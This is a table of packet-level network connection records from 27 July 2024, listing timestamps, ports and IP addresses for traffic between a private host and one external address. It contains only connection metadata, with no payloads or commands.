Jul 27, 2024 06:57:09.726147890 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726167917 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726175070 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726176023 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726217985 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726226091 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726233006 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726264954 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726294041 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726309061 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726316929 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726375103 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726448059 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726457119 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726470947 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726478100 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726485014 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726491928 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726500034 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726505995 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726514101 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726515055 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726521969 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726531029 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726538897 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726586103 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726588964 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726622105 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726623058 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726639032 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726655006 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726676941 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726685047 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726689100 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726722002 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726732969 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726741076 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726743937 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726753950 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726763964 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726835012 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726839066 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726902962 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726911068 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726974010 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726983070 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726991892 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727005959 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727014065 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727037907 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727045059 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727066994 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727071047 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727080107 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727096081 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727139950 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727149010 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727149010 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727158070 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727193117 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727200031 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727206945 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727233887 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727278948 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727312088 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727320910 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727328062 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727344036 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727350950 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727358103 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727365017 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727380991 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727412939 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727433920 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727433920 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727443933 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727451086 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727467060 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727502108 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727519989 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727523088 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727531910 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727540016 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727546930 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727601051 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727608919 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727612019 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727613926 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727675915 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727677107 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727686882 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727695942 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727703094 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.727746010 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.727763891 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.770261049 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.770642996 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.770744085 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.770809889 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.770875931 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.770946980 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.805495977 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.807766914 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.807910919 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.807976007 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.808048964 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.808109045 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.808190107 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.813479900 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813491106 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813498974 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813505888 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813513994 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813520908 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813528061 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813534021 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813536882 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813544035 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813549995 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813556910 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813565016 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813568115 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813569069 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.813575029 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813585043 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813591957 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813595057 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813602924 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813610077 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813617945 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813625097 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813627958 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813635111 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813638926 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813646078 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.813663006 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813672066 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813679934 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813688993 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813695908 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813702106 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813704967 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813708067 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813709974 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813715935 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813723087 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813729048 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813747883 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813755035 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813756943 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.813759089 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813766003 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813772917 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813787937 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813793898 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813802004 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813811064 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813817978 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813821077 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813832045 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813838959 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813987017 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.813993931 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814007998 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814016104 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814088106 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814201117 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814208031 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814210892 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814214945 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814218044 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814220905 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814228058 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814234972 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814243078 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814260960 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814275980 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814282894 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814285040 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814291000 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814297915 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814311028 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814317942 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814325094 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814331055 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814335108 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814337015 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814346075 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814352989 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814356089 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814363003 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814420938 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814426899 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814434052 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814440966 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814486980 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814493895 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814496994 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814505100 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814519882 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814527035 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814533949 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814541101 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814549923 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814666986 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814675093 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814682007 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814696074 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814702988 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814706087 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814712048 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814718962 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814727068 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814763069 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814769983 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814778090 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814785004 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814788103 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814802885 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814810038 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814862967 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814870119 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814877033 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814889908 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814893007 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814894915 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.814933062 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815027952 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815035105 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815084934 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815092087 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815099001 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815103054 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815154076 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815160990 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815207005 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815213919 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815251112 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815258026 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815325022 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815331936 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815339088 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815398932 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815406084 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815463066 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815470934 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815476894 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815529108 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815536022 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815592051 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815598965 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815634966 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815642118 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815649986 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815664053 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815670967 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815726042 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815733910 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815766096 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815779924 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815787077 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815838099 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815870047 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815884113 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815891027 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815941095 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815948963 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.815996885 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816004038 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816046000 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816052914 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816102982 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816111088 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816123962 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816131115 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816164017 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816170931 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816230059 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816237926 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816344976 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816359043 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816365957 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816417933 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816423893 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816435099 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816450119 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816464901 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816472054 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816520929 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816528082 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816579103 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816586971 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816601038 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816608906 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816643953 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816652060 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816713095 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816720963 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816729069 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816735983 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816744089 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.816751957 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818705082 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818744898 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818845987 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818854094 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818912029 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.818948984 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819111109 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819119930 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819164038 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819180012 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819307089 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819314957 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819380045 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819387913 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819463968 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819472075 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819479942 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819488049 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819529057 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819602013 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819610119 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819623947 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819633007 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.819641113 CEST	55615	49706	185.222.58.236	192.168.2.5
